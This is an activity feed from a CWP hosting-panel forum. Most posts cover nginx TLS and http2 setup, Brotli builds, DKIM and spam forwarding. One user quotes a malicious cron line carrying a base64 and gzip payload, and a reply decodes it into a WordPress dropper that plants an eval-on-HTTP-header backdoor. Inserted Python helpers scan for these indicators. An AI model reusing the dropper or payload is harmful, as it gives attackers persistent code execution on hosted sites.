All Activity

  1. Today
  2. Will this guide work on an AL8 elevated CWP server?
  3. Yesterday
  4. some meial functions are not working only
  5. @Sandeep B. I am going to be doing a server migration, and doing a fresh CWP install on the existing one, and before I build and rebuild a server... Is CWP Pro ready for AlmaLinux 9? CWP HQ says "AlmaLinux 9 has some missing features". What missing features? Is there a list / link to specs? Development updates? I am running PHP 8.2 & 8.3 for WordPress and Nextcloud, nginx/apache/Varnish/modsec/. Anyways, thanks for the feedback.
  6. Earlier
  7. As of now I am able to resolve the issue. Solution:
     Step 1: Made sure that SpamAssassin is working. https://forum.centos-webpanel.com/e-mail/how-to-install-spamassassin-updated/msg51428/#msg51428 and other threads
     Step 2: Added an outgoing email filter to block emails with subject SPAM. https://talk.plesk.com/threads/do-not-forward-spam-emails-to-external-mailbox.370124/
     This is working very well now.
  8. Hello, I solved the problem on my server. The following is what I could get out of this experience.

     In the case one has a recent Linux version, just as in my case in which I had AlmaLinux 9.5, then updated to 9.6 (Sage Margay), and a recent CWP Pro version (mine now is 0.9.8.1204), there is no need to compile Nginx and other components. Just in case, before starting check if your Nginx, OpenSSL and Apache are compiled to support http2, maybe http3, and TLSv1.3; if they are, you are good to proceed.

     The next step is to create proper templates for the webservers (nginx in particular if you use it as reverse proxy) as described by Sandeep (thank you Sandeep for the help, very appreciated in the years!). While you do this you also might want to add security directives and options; that depends on your needs.

     Then rebuild your host and vhost configurations, and check that all nginx conf files so generated are correct and reflect your choices (if they do not, you have some mistake in your templates; adjust and check, eventually later on fix your templates too).

     In the latest nginx builds the use of the directive (here with variables as seen in the nginx conf templates in CWP)

         listen %ip%:%nginx_port% ssl %http2%;

     is deprecated; use the following instead:

         listen %ip%:%nginx_port% ssl;
         %http2% on;

     In your generated conf files it will look like this:

         listen 123.123.1231233:443 ssl;
         http2 on;

     Check in your nginx conf files of the host and vhosts that all lines telling ssl_protocols do have both TLSv1.2 and TLSv1.3 stated, as follows:

         ssl_protocols TLSv1.2 TLSv1.3;

     When done, check the nginx configuration in a terminal by running

         nginx -t

     If it is OK without errors, restart the nginx service (either from CWP or terminal).

     I am not sure that changing the host name as suggested in the previous post from TheHolbi is always necessary; however, if when checking your website for TLSv1.3 (e.g. against the Qualys website, or in your terminal) you get errors, try "change hostname" in CWP. In reality you do not really need to actually change the name of your host, you just need to click the button so as to have everything rebuilt and a new certificate generated. If you want to improve your host security you can choose the 4096 bit key; this will increase computation and some traffic, but this is not truly going to affect all of your server (as far as I understood... I should dig more on that).

     In conclusion, if you have CWP Pro (maybe also the free one, I do not know as I did not try it) on AlmaLinux 9.6 everything is already good to go, you just need to tell the server to use TLSv1.3.

     That's all folks. Thank you again for all the help published here and other websites, special thanks to Sandeep again. Bye.
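The two checks the post describes (no `http2` parameter on `listen`, and both TLSv1.2 and TLSv1.3 on every `ssl_protocols` line), as an added example that is not part of the original post or of CWP. The sample configurations are constructed, and the legacy-protocol warning is an extra check the post does not mention.

```python
import re
import sys

LISTEN = re.compile(r"^[ \t]*listen[ \t]+([^;#\n]+);", re.M)
PROTOCOLS = re.compile(r"^[ \t]*ssl_protocols[ \t]+([^;#\n]+);", re.M)
REQUIRED = ("TLSv1.2", "TLSv1.3")          # both must be listed, per the post
LEGACY = ("SSLv3", "TLSv1", "TLSv1.1")     # added check, not from the post

def lint_nginx_conf(name, text):
    """Return findings for one generated host or vhost configuration file."""
    findings = []

    def report(match, message):
        line = text.count("\n", 0, match.start(1)) + 1
        findings.append(f"{name}:{line}: {message}")

    for m in LISTEN.finditer(text):
        if "http2" in m.group(1).split():
            report(m, "deprecated 'http2' listen parameter, use 'http2 on;'")
    for m in PROTOCOLS.finditer(text):
        listed = m.group(1).split()
        missing = [p for p in REQUIRED if p not in listed]
        legacy = [p for p in LEGACY if p in listed]
        if missing:
            report(m, "ssl_protocols is missing " + " ".join(missing))
        if legacy:
            report(m, "ssl_protocols still enables " + " ".join(legacy))
    return findings

# Constructed samples: a vhost from an old template and one from a fixed template.
SAMPLE_OLD = """server {
    listen 203.0.113.10:443 ssl http2;
    ssl_protocols TLSv1.1 TLSv1.2;
}
"""
SAMPLE_NEW = """server {
    listen 203.0.113.10:443 ssl;
    http2 on;
    ssl_protocols TLSv1.2 TLSv1.3;
}
"""

if __name__ == "__main__":
    for path in sys.argv[1:]:              # pass the generated conf files
        with open(path, encoding="utf-8", errors="replace") as fh:
            for finding in lint_nginx_conf(path, fh.read()):
                print(finding)
```

Commented-out directives are ignored, and `nginx -t` remains the final check because this only reads text and does not resolve includes.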
  9. Email messages are essentially text messages. When you install postfix-pcre, it will perform a regex analysis on each message, and this involves additional processing. If you have a small volume of messages on your mail server, this is fine, there should be no problem. But if your traffic is heavier, I recommend that you do a performance analysis, and if there is an impact, find a less expensive solution.
  10. I see some hints at https://talk.plesk.com/threads/do-not-forward-spam-emails-to-external-mailbox.370124/: using postfix-pcre to block outgoing emails with SPAM in the subject line. I have implemented the same. Hope it works; I will update it here.
  11. Not working on CWP 9.5 AlmaLinux as of today due to version mismatch of module and nginx server. I am currently on nginx-1.28.0.

      Here's a complete step-by-step I followed to get Brotli compression working in my CWP (AlmaLinux 9.5) Nginx stack. Hope it will help somebody. This tutorial is future version ready!!!

      1. Install Build Dependencies

             sudo dnf install -y epel-release
             sudo dnf groupinstall "Development Tools" -y
             sudo dnf install -y \
               gcc make pcre2-devel zlib-devel openssl-devel git \
               brotli brotli-devel

         brotli/brotli-devel gives you the CLI compressor (optional but useful). The rest are needed to compile the Nginx module.

      2. Clone the ngx_brotli Module

             cd /usr/local/src
             sudo git clone https://github.com/google/ngx_brotli.git
             cd ngx_brotli
             sudo git submodule update --init

      3. Download Matching Nginx Source

             # Find your installed Nginx version
             NGINX_VER=$(nginx -v 2>&1 | awk -F/ '{print $2}')
             cd /usr/local/src
             sudo curl -LO http://nginx.org/download/nginx-$NGINX_VER.tar.gz
             sudo tar zxvf nginx-$NGINX_VER.tar.gz

      4. Compile Only the Dynamic Brotli Module

             cd nginx-$NGINX_VER
             sudo ./configure \
               --with-compat \
               --add-dynamic-module=../ngx_brotli
             sudo make modules

         This produces two files in objs/:
         ngx_http_brotli_filter_module.so
         ngx_http_brotli_static_module.so

      5. Install the Compiled Modules

             sudo mkdir -p /etc/nginx/modules
             sudo cp objs/ngx_http_brotli_filter_module.so \
               objs/ngx_http_brotli_static_module.so \
               /etc/nginx/modules/

      6. Enable the Modules in Nginx

         Edit your main /etc/nginx/nginx.conf at the very top, before any events/http/stream blocks:

             load_module modules/ngx_http_brotli_filter_module.so;
             load_module modules/ngx_http_brotli_static_module.so;

         Be sure these lines come before the first worker_processes or events block.

      7. Configure Brotli in Your HTTP Context

         Inside the http { ... } section of /etc/nginx/nginx.conf, add or adjust:

             # Compression brotli
             brotli on;
             brotli_comp_level 6;
             brotli_static on;
             brotli_types text/xml image/svg+xml application/x-font-ttf
                 image/vnd.microsoft.icon application/x-font-opentype
                 application/json font/eot application/vnd.ms-fontobject
                 application/javascript font/otf application/xml
                 application/xhtml+xml text/javascript application/x-javascript
                 text/plain application/x-font-truetype application/xml+rss
                 image/x-icon font/opentype text/css image/x-win-bitmap;

         You can tune brotli_comp_level (1–11) and the MIME types as needed.

      8. Test and Reload

             sudo nginx -t
             sudo systemctl reload nginx

      9. Verify

         CLI:

             brotli --version

         HTTP: Use curl to check the Content-Encoding header:

             curl -H "Accept-Encoding: br" -I https://your.domain/

         You should see:

             Content-Encoding: br

      That's it - your CWP Nginx now serves Brotli-compressed responses
  12. A simple restart on your php-fpm server, while serving pages, can cause these messages. A restart on your php-fpm server can occur if you run a cron process restarting the server at that time, or, for example, if you set a rebuild in the CWP configuration that did not complete. Check the cron logs (/var/log/cron) at that time to see if there is a process restarting your php-fpm around that time. Regards, Netino
  13. It is not feasible to disable these redirects. So, you can do what I do: use a global antispam system on your server, where you can use postscreen, and use a system (Spamassassin, Rspamd, etc.) that performs Bayesian analysis of emails (there will be complaints; globally means spam for some, but not for others). But Bayesian analysis learns fast, before the problem turns big. Rspamd has neural analysis, too. In addition, monitor rejections from major providers: Gmail, Outlook (mainly Hotmail), etc. When there are problems with these major email providers, they complain first with error messages, gradually lowering the reputation of your mail server. With active monitoring, you will have enough time to avoid a definitive block on them, and you will have time to complain about the redirections of your clients, or even disable them. Regards, Netino
  14. [Wed May 21 00:34:42.824943 2025] [proxy_fcgi:error] [pid 296120:tid 296160] (70007)The timeout specified has expired: [client xxx:43672] AH01075: Error dispatching request to : (polling) Connection refused: AH02454: FCGI: attempt to connect to Unix domain socket /opt/alt/php-fpm82/usr/var/sockets/domain.sock (localhost:8000) failed AH01079: failed to make connection to backend: localhost
      I get this error EVERY night at around 00-02; the only way to get the page up again is by restarting the php-fpm service. All other sites on the server are online, only 1 page goes down. I can't figure out what causes this. Any ideas?
  15. My users have set up many email forwards. The SPAM emails also get forwarded. Due to this, email providers like Microsoft / Gmail are rate limiting emails from my servers and also blacklisting the IP. How do I stop my server forwarding SPAM? I have enabled ClamAV, Amavis & Spamassassin.
  16. And all of the hackers they have and allow on their network...
  17. Imunify AV is not fully compatible with CWP yet. You can ask Imunify to check the compatibility.
  18. @Sandeep B. Is there a guide for installing Imunify AV on CWP? Could you have a go at it and try to make a guide for standalone installation, or even better, making an in-panel integration?
  19. 8Core posted a post in a topic in Other WEB Panels
    Have you tried adding a custom img centos7 iso to your account on contabo VPS control?
  21. On a rather very old CentOS 7 installation, I have a user called "admin". However, this username is no longer allowed, and when I try to use it, I get the message "username is a reserved word". I've been thinking about reinstalling the server for a while, but I'm not sure if I'll be able to restore the backup for that user due to the username. Since I can't change the username on the active server, is there any way to resolve this issue?
  22. Hello, I do have CWP Pro updated to the latest version as of April 2025, updated AlmaLinux 9.5, Apache/2.4.62 + nginx 1.28.0, php-fpm; also I forced use of https http2. I have tried to add use of TLS 1.3 following the last post in this thread: "The solution of TLSv1.3 in AlmaLinux 9.5 with CWP Pro was reinstall hostname certificates (for all services) in the Change Hostname menu with 4096 size key. After then all issue was resolved, and the TLSv1.3 check was pass in both way, from terminal and from browser also. Of course in all templates and Nginx config files was changed the setting to ssl_protocols TLSv1.2 TLSv1.3;" I did not notice errors, but it does not work. Am I missing something? Thank you in advance for any help.
  23. This is obfuscated code in base64. Decoding this base64 sequence generates the following PHP code, which will be executed by PHP itself through the "eval" PHP function:

          phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');
          function phpConfValidate($ser) {
              list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
              $source = file_get_contents($fullPath);
              if (preg_match($systemEnv, $source)) { return; }
              if (!preg_match($pattern, $source, $matches)) { return; }
              $incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);
              $newSource = preg_replace($incorrectRegex, '', $source);
              $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);
              if (!preg_match($systemEnv, $newSource)) { return; }
              $filemtime = filemtime($fullPath) + 10;
              unlink($fullPath);
              file_put_contents($fullPath, $newSource);
              touch($fullPath, $filemtime);
          }

      Decoding the following sequence:

          phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');

      ...we will get code that will be saved and executed on your server:

          a:4:{i:0;s:50:"/home/fotballnerd/public_html/wp-includes/meta.php";i:1;s:98:"~eval[^\(\n\r]*\([^\$]*\$_[A-Z]{6}[^\[]*\[[^\'\"]*[\'\"]HTTP_D341BED[\'\"][^\]]*\][^\)]*\)[^;]*;~s";i:2;s:32:"@eval($_SERVER['HTTP_D341BED']);";i:3;s:33:"~^\s*function\s+update_metadata~m";}

      It's a sequence of obfuscated sequences of code. Does this last line make sense to you? If not, it is strongly possible your user is trying to crack your server.

      Check a discussion on this site: https://www.operationdecode.com/http-header-injection-and-modsecurity-evasion/

      The result on your server is very similar to what is shown on this site, like they said:

      "Further analysis also indicated that this method could be used to connect to a C2 and act as a zombie host. Throughout our investigation, and in reviewing a large number of these cron and files; we can see this is a direct attack on WordPress, where the code is being injected into default WordPress files that are required for the WordPress page to load. What this allows for, is the malicious actor to send the request directly to the domain name, and not to the affected files to get the desired outcome. Furthermore, when reviewing the access logs, there is no evidence of an attack. What is visible in the logs are only the GET requests to the root of the website. This was tested on a local installation of an infected site. (...) As this method for persistence and connecting to a c2 is very stealthy, it is not easily detected and may be overlooked. A search via the command line for "@eval(http_" should help in finding if this infection exists in your WordPress installation."

      Regards, Netino
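A triage helper for the case discussed in the post above, as an added example that is not part of the original posts: it flags the two patterns quoted there and decodes the dropper's base64 argument into its fields without executing anything. The sample blob, its path and the `HTTP_EXAMPLE` header are constructed placeholders, and the function names are this example's own.

```python
import base64
import re

# Indicators described in the posts: the cron one-liner's decode-and-run wrapper
# and the header-driven eval line that the dropper writes into a PHP file.
INDICATORS = {
    "cron_eval_wrapper": re.compile(
        r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "header_eval_backdoor": re.compile(
        r"eval\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_\w+['\"]\s*\]\s*\)", re.I),
}
ELEMENT = re.compile(rb'i:(\d+);s:(\d+):"')

def scan_text(text):
    """Names of indicators present in a crontab line or in PHP source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def parse_php_string_array(data):
    """Parse serialize() output shaped a:N:{i:K;s:LEN:"...";...} without running it."""
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, out = head.end(), {}
    for _ in range(int(head.group(1))):
        m = ELEMENT.match(data, pos)
        if not m:
            raise ValueError(f"unsupported element at offset {pos}")
        end = m.end() + int(m.group(2))        # s:LEN counts bytes, not characters
        if data[end:end + 2] != b'";':
            raise ValueError("declared string length does not match the data")
        out[int(m.group(1))] = data[m.end():end].decode("utf-8", "replace")
        pos = end + 2
    return out

def triage_dropper_config(b64_blob):
    """Decode the dropper's argument and report what it targets and injects."""
    f = parse_php_string_array(base64.b64decode(b64_blob))
    header = re.search(r"HTTP_\w+", f.get(2, ""))
    return {"target_file": f.get(0), "injected_code": f.get(2),
            "trigger_header": header.group(0) if header else None,
            "indicators": scan_text(f.get(2, ""))}

# Constructed sample in the same four-field layout (placeholder path and header).
SAMPLE_PATH = "/home/exampleuser/public_html/wp-includes/meta.php"
SAMPLE_CODE = "@eval($_SERVER['HTTP_EXAMPLE']);"
SAMPLE_BLOB = base64.b64encode(
    f'a:4:{{i:0;s:{len(SAMPLE_PATH)}:"{SAMPLE_PATH}";i:1;s:3:"~a~";'
    f'i:2;s:{len(SAMPLE_CODE)}:"{SAMPLE_CODE}";i:3;s:3:"~b~";}}'.encode()).decode()
```

Run `scan_text` over each line of the user crontabs and over PHP files under the web roots; a `target_file` from `triage_dropper_config` tells you which file to restore from a clean copy.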
  24. You can use the following command:

          opendkim-genkey -b 1024 -d yourdomain.com -D /etc/opendkim/keys/yourdomain.com -s yourselector -v

      If that doesn't work, you'll need to resort to a longer checklist, which you can check here: <https://easydmarc.com/blog/how-to-configure-dkim-opendkim-with-postfix/> Regards, Netino
  25. Hi everyone, I am running CWP on Almalinux8 and recently ran into an email-delivery problem. When I checked /etc/opendkim/userkeys/mydomain.com, I discovered that both default.txt (DNS record) and default.private (signing key) are missing.
      What I have tried so far:
      - Used the DKIM Manager in CWP to regenerate keys.
      - Rebuilt/restarted the mailserver via CWP's control panel.
      Unfortunately, the key files never appear and the DKIM signature remains invalid. Can anyone share the exact steps or commands to regenerate the DKIM key pair (default.txt / default.private) for a domain under CWP?
  26. Some users are creating cron jobs under their username. How can I make sure that this stops? It looks like this: /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmEuVqGWZCepebWxUwbayPG+l2kzCNIaI4x1M0OYJsQ0MKUOUJcdcOyx2hFYUo6dNYDLotl7l38q0q2qF3YoRS2O6pb4cBD6dKuzKPfB5UN+g5B9K29oxhWEcI8g09ISeeQ8JizcxiogJ+fNFovBZEDOz3oh4Lojfv5lxXB/NQjw1cG8GRfli70dd517sTSquJR6b/oB8Wsi+pZ/Sr92geAUPw4fN/WzKo9fXB5Gd6vHzzrxT+4+0//GtGnXAcLAfex2fjFs4E2RpS0spwdR/9xTqxxKlHz2WD5pgYVoVfII4ZOWIl8Zf")));'
  27. Recreate the user and try the upgrade again:

          CREATE USER `mariadb.sys`@`localhost` ACCOUNT LOCK PASSWORD EXPIRE;
          GRANT SELECT, DELETE ON `mysql`.`global_priv` TO `mariadb.sys`@`localhost`;
  28. Hi Sandeep, the upgrade went with a few hiccups but I managed to get it working. When I do mysql -V it shows me:

          mysql Ver 15.1 Distrib 10.11.11-MariaDB, for Linux (x86_64) using readline 5.1

      But after I did the command mysql_upgrade --force and I scrolled up, it gave me this:

          mysql.transaction_registry OK
          mysql.user OK
          Phase 2/8: Installing used storage engines... Skipped
          Phase 3/8: Running 'mysql_fix_privilege_tables'
          Phase 4/8: Fixing views
          mysql.user
          Warning : The user specified as a definer ('mariadb.sys'@'localhost') does not exist
          status : OK
          sys.host_summary OK

      The rest says all OK... behind. Is this an issue or ? Regards, Mike